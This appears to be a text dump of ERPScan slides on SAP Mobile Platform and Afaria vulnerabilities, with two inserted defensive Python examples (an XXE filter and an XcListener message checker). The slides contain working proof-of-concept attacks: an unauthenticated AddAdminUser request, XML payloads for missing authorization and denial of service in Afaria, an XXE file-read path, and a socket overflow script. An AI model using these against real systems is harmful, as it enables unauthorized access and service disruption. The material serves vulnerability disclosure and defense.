About ERPScan
• The only 360-degree SAP Security solution - ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP (150+)
• 60+ presentations at key security conferences worldwide
• 25 awards and nominations
• Research team - 20 experts with experience in different areas of security
• Headquarters in Palo Alto (US) and Amsterdam (EU)
SMP protocols
Protocol support across the releases SUP 2.1.3, SUP 2.2, SMP 2.3 and SMP 3.0:
• SMP Messaging: supported in all four releases
• SMP Replication: supported in all four releases
• HTTP REST API: supported in three of the four releases
• SAP Agentry: supported in two of the four releases
SAP Control Center (Portal)
• Working process: sccservice.exe
• Open ports:
– 2100 (Messaging service)
– 8282/8283 (Portal)
– 9999 (RMI)
SAP Mobile Server services
• MobiLink
• AdminWebServices
• MlsrvWrapper
• InfoboxMultiplexer
• OBMO
• JMSBridge
Decrypting the SAP Mobile Platform GIOP protocol
• GIOP - the General Inter-ORB Protocol is the abstract protocol by which object request brokers (ORBs) communicate
• Uses mlsrv16.exe (MobiLink) - port 2000
XXE in the SAP Mobile Platform portal page…
• Portal URL: https://IP_ADDR:8283/scc
• web.xml & services-config.xml
C:\SAP\SCC-3_2\services\EmbeddedWebContainer\container\Jetty-7.6.2.v20120308\work\jetty-0.0.0.0-8282-scc.war-_scc-any-\webapp\WEB-INF\web.xml
<servlet-mapping>
<servlet-name>MessageBrokerServlet</servlet-name>
<url-pattern>/messagebroker/*</url-pattern>
</servlet-mapping>
…XXE…
C:\SAP\SCC-3_2\services\EmbeddedWebContainer\container\Jetty-7.6.2.v20120308\work\jetty-0.0.0.0-8282-scc.war-_scc-any-\webapp\WEB-INF\flex\services-config.xml
<channel-definition id="scc-http"
class="mx.messaging.channels.HTTPChannel">
<endpoint url="http://{server.name}:{server.port}/scc/messagebroker/http"
class="flex.messaging.endpoints.HTTPEndpoint" />
</channel-definition>
Endpoints exposed by the message broker:
1. /scc/messagebroker/amfpolling
2. /scc/messagebroker/amfsecurepolling
3. /scc/messagebroker/http
4. /scc/messagebroker/httpsecure
5. /scc/messagebroker/amflongpolling
Read file with XXE
C:\SAP\MobilePlatform\Servers\UnwiredServer\Repository\Instance\com\sybase\sup\server\SUPServer\sup.properties
sup.imo.upa = 457ba103a46559486a81350d552a9e47fb085927eb6df0ccc79231bc3d
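The defensive counterpart to the XXE slides above is to refuse any request body that declares a DTD before it reaches the XML parser behind the /scc/messagebroker/* endpoints. The Python below is an added example and not ERPScan's or SAP's code; the two sample bodies are constructed for it, and the file path inside the DTD sample is a placeholder, not a path from the slides.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample request bodies (not taken from the original slides):
# a plain message and one that declares a DTD with an external entity,
# which is the shape of input an XXE-prone endpoint must never parse.
BENIGN_BODY = b'<?xml version="1.0"?><request><op>ping</op></request>'
DTD_BODY = (b'<?xml version="1.0"?>'
            b'<!DOCTYPE r [<!ENTITY ext SYSTEM "file:///PLACEHOLDER_PATH">]>'
            b'<request><op>&ext;</op></request>')

# Any DOCTYPE or ENTITY declaration is grounds for rejection. The match is
# case-insensitive on purpose so no spelling variant slips past the check.
_DTD_MARKERS = re.compile(rb'<!\s*(DOCTYPE|ENTITY)\b', re.IGNORECASE)


def find_dtd_markers(body):
    """Return the DTD keywords found in the raw bytes, before any parsing."""
    return [m.group(1).decode('ascii').upper()
            for m in _DTD_MARKERS.finditer(body)]


def parse_without_dtd(body):
    """Parse a request body only if it declares no DTD.

    Refusing the DOCTYPE up front is the mitigation: external entities,
    parameter entities and entity-expansion bombs all need a DTD, so none
    of them can reach the parser at all.
    """
    markers = find_dtd_markers(body)
    if markers:
        raise ValueError('DTD not allowed in request body: ' + ', '.join(markers))
    return ET.fromstring(body)


def screen_bodies(bodies):
    """Classify a batch of bodies, e.g. replayed from a capture or a proxy log."""
    return ['reject' if find_dtd_markers(b) else 'accept' for b in bodies]


if __name__ == '__main__':
    print(screen_bodies([BENIGN_BODY, DTD_BODY]))  # ['accept', 'reject']
```

The pre-parse check is deliberately independent of the parser library: it works the same in front of a Flex/BlazeDS servlet, a reverse proxy or a log replay, and it does not depend on a parser feature flag being set correctly on every endpoint.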
SAP Mobile Platform unauthenticated access to other servlets
• Architecture and program vulnerabilities in SAP's J2EE engine (BlackHat USA 2011)
• web.xml files revealed hidden methods to:
– Read and generate logs
– Deploy and install JAR packages
AdminWebService
POST /MobileOffice/Admin.asmx/AddAdminUser HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: length

strUserName=Admin2&strActivationCode=123QWEasd&iExpirationHours=100
SAP SQL Anywhere BoF/Code Execution
• CVE-2008-0912 - The MobiLink server is affected by a heap overflow which happens during the handling of strings like username, version, and remote ID (all pre-auth) which are longer than 128 bytes
• CVE-2014-9264 - Stack-based buffer overflow in the .NET Data Provider in SAP SQL Anywhere allows remote attackers to execute arbitrary code via a crafted column alias
SAP EMR Unwired SQL injection
• CVE-2013-7096 (CVSS 7.5)
• AndroidManifest.xml:
<provider
android:name=".providers.ModiDataDbProvider"
android:authorities="com.sap.mobi.docsprovider" />
Content URIs served by the provider:
1. content://com.sap.mobi.docsprovider/documents/offline_cat
2. content://com.sap.mobi.docsprovider/documents/offline/
3. content://com.sap.mobi.docsprovider/documents/sample
4. content://com.sap.mobi.docsprovider/documents/online
5. content://com.sap.mobi.docsprovider/documents/offline_auth
6. content://com.sap.mobi.docsprovider/documents/offline
7. content://com.sap.mobi.docsprovider/documents/online_auth
8. content://com.sap.mobi.docsprovider/documents/sample/
9. content://com.sap.mobi.docsprovider/documents/online_cat
SAP Afaria
• MDM Solution
– Version 7.0 SP5: Released August 2014 (as SAP Afaria SP5)
– Version 7.0 SP4: Released December 2013 (as SAP Afaria SP4)
– Version 7.0 SP2: Released December 2012 (as SAP Afaria SP2)
– Version 7.0: Released April 2012 (as SAP Afaria)
– Version 6.6: Released September 2010
– Version 6.5: Released November 2009
– Version 6.0: Released December 2008
– Version 5.0: Released November 2003
– Version 4.0: Released June 2000 (as Afaria)
– Version 3.5: Released May 2000 (as Afaria for Handhelds)
– Version 3.0: Released October 1999
– Version 2.0: Released February 1999 (as CONNECT:Manage)
– Version 1.2: Released October 1997 (as RemoteWare Express)
– Version 1.0: Released February 1997 (as SessionXpress)
How it works
• Provide and enroll devices in management
• Define device settings
• Secure devices and data
• Collect inventory
• Distribute software
• Collect device activity data for managing expenses
Missing authorization
• Command value Run Channel or Test
• The XML request must start with 4 spaces
• PoC:
<AfariaNotify version="1.0.0">
<Message type="Command" value="Run Channel">
<Client name="AFARIA70PT">
<Client name="LOCALHOST" GUID="59146189-1f92-46d5-85aa-6293631d5d2e">
<Transmitter address="172.16.2.67:4444\asd">
<Channel address="\\172.16.2.67:4444\asd" name="\\172.16.2.67:4444\df"></Channel>
</Transmitter>
</Client>
</Message>
</AfariaNotify>
Prevention
• Install SAP security note 2134905: Missing authorization check in XCListener
• Install SAP security note 1864518: Security Improvements for MOB-APP-EMR-AND
XcListener DoS
<AfariaNotify version="1.0.0">
<Message type="Command" value="Run Channel">
<Client name="LOCALHOST">
<Client name="LOCALHOST" GUID="59146189-1f92-46d5-85aa-6293631d5d2e">
<Transmitter address="172.16.2.67:4444\">
<Channel address="\\172.16.2.67:4444\asd" name="\\172.16.2.67:4444\(A*1491)">
</Channel>
</Transmitter>
</Client>
</Message>
</AfariaNotify>(A*3678)
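A monitoring check for traffic to the XcListener port, covering both slides above: it tags well-formed AfariaNotify messages that carry the Run Channel or Test command (the values the listener accepts without an authorization check) and drops messages with the traits of the DoS payload (an oversized attribute value inside the document, filler bytes after the closing tag) or with no XML at all. The Python below is an added example and not ERPScan's or SAP's code; the sample messages, the 192.0.2.x addresses, the all-zero GUID and the MAX_ATTR_LEN limit are constructed for it, while the message layout follows the PoCs on the slides.

```python
import xml.etree.ElementTree as ET

# Constructed sample messages in the layout of the AfariaNotify PoCs above.
# Addresses (RFC 5737 test range) and the GUID are made up for this example.
NORMAL_MSG = (
    '    <AfariaNotify version="1.0.0">'
    '<Message type="Command" value="Run Channel">'
    '<Client name="LOCALHOST" GUID="00000000-0000-0000-0000-000000000000">'
    '<Transmitter address="192.0.2.10:4444\\chan">'
    '<Channel address="\\\\192.0.2.10:4444\\chan" name="\\\\192.0.2.10:4444\\chan">'
    '</Channel></Transmitter></Client></Message></AfariaNotify>'
)
# The two traits of the DoS payload: a very long attribute value inside the
# document and filler bytes after the closing tag.
DOS_MSG = NORMAL_MSG.replace('name="\\\\192.0.2.10:4444\\chan"',
                             'name="' + 'A' * 1491 + '"') + 'A' * 3678
# Raw filler with no XML at all, the shape of the XcListener BoF PoC.
RAW_MSG = 'A' * 4098

MAX_ATTR_LEN = 256        # assumed limit; tune to the longest legitimate channel name
CLOSING_TAG = '</AfariaNotify>'
PRIVILEGED_COMMANDS = ('Run Channel', 'Test')   # values the slides say lack an auth check


def inspect_afaria_message(raw):
    """Inspect one message sent to the XcListener port and return its findings.

    Findings starting with 'command:' are informational (the message is well
    formed but carries a privileged command, which is worth logging with its
    source); every other finding marks a message that should be dropped.
    """
    findings = []
    if not raw.lstrip().startswith('<AfariaNotify'):
        findings.append('not_afaria_notify')
        return findings
    end = raw.find(CLOSING_TAG)
    if end == -1:
        findings.append('unterminated')
        return findings
    trailing = len(raw) - (end + len(CLOSING_TAG))
    if trailing:
        findings.append('trailing_bytes:%d' % trailing)
    # The listener expects four leading spaces; the XML parser does not care.
    try:
        root = ET.fromstring(raw[:end + len(CLOSING_TAG)].lstrip())
    except ET.ParseError:
        findings.append('malformed_xml')
        return findings
    msg = root.find('Message')
    if (msg is not None and msg.get('type') == 'Command'
            and msg.get('value') in PRIVILEGED_COMMANDS):
        findings.append('command:' + msg.get('value'))
    for el in root.iter():
        for attr, value in el.attrib.items():
            if len(value) > MAX_ATTR_LEN:
                findings.append('oversized_attr:%s.%s=%d' % (el.tag, attr, len(value)))
    return findings


def verdict(raw):
    """'allow' a clean message, 'drop' anything with a non-informational finding."""
    findings = inspect_afaria_message(raw)
    return 'drop' if any(not f.startswith('command:') for f in findings) else 'allow'


if __name__ == '__main__':
    for name, msg in (('normal', NORMAL_MSG), ('dos', DOS_MSG), ('raw', RAW_MSG)):
        print(name, verdict(msg), inspect_afaria_message(msg))
```

Sitting in front of the listener (or fed from a capture), the check blocks the malformed and oversized input before it reaches the native parser, while the 'command:' findings give the record a defender needs to correlate Run Channel and Test requests with their source once the missing-authorization note is applied.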
XcListener BoF
• PoC:
import socket

HOST = 'hostname'   # XcListener host
PORT = 3005         # XcListener port

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
poc = 'A' * 4098    # 4098-byte payload described on the slide
s.send(poc.encode())
data = s.recv(10000)
s.close()
print('Received', data)
Each SAP landscape is unique and we pay close attention to the requirements of our customers and prospects. ERPScan development team constantly addresses these specific needs and is actively involved in product advancement. If you wish to know whether our scanner addresses a particular aspect, or simply have a feature wish list, please e-mail us. We will be glad to consider your suggestions for the future releases or monthly updates.
About
USA HQ: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA 94301
EU HQ: Luna ArenA, 238 Herikerbergweg, 1101 CM Amsterdam
www.erpscan.com
[email protected]